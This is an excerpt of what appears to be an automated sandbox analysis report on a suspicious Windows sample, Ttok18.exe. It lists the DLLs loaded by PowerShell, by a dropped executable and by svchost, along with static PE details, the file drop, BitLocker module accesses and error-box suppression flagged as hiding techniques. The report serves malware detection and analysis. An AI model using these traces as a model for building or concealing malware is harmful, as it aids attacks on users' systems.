            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: apphelp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: sspicli.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: wininet.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: rstrtmgr.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ncrypt.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ntasn1.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: dbghelp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: iertutil.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windows.storage.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: wldp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: profapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: kernel.appcore.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: winhttp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: mswsock.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: iphlpapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: winnsi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: urlmon.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: srvcli.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: netutils.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: dnsapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: rasadhlp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: fwpuclnt.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: schannel.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: mskeyprotect.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: msasn1.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: dpapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: cryptsp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: rsaenh.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: cryptbase.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: gpapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ncryptsslp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ntmarta.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: uxtheme.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windowscodecs.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: propsys.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windows.fileexplorer.common.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ntshrui.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: cscapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: linkinfo.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: edputil.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: wintypes.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: appresolver.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: bcp47langs.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: slc.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: userenv.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: sppc.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: pcacli.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: mpr.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Ttok18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Ttok18.exeStatic file information: File size 22020096 > 1048576
            Source: Ttok18.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Ttok18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: Ttok18.exe
            Source: Ttok18.exeStatic PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drStatic PE information: section name: .00cfg
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029642BD push ebx; ret 4_2_029642DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0296635D push eax; ret 4_2_02966371
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02AD42BD push ebx; ret 8_2_02AD42DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02AD635D push eax; ret 8_2_02AD6371
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02AD2CA5 push 04B80734h; retf 8_2_02AD2D0E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02AD2C70 push 04B80734h; retf 8_2_02AD2D0E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_071F3BD2 push FFFFFF8Ch; retf 8_2_071F3BD4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0339E610 push 00000008h; ret 11_2_0339E620
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0339DA81 push 00000008h; ret 11_2_0339DA90
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drStatic PE information: section name: .text entropy: 6.864188260151341
            Source: C:\Users\user\Desktop\Ttok18.exeFile created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
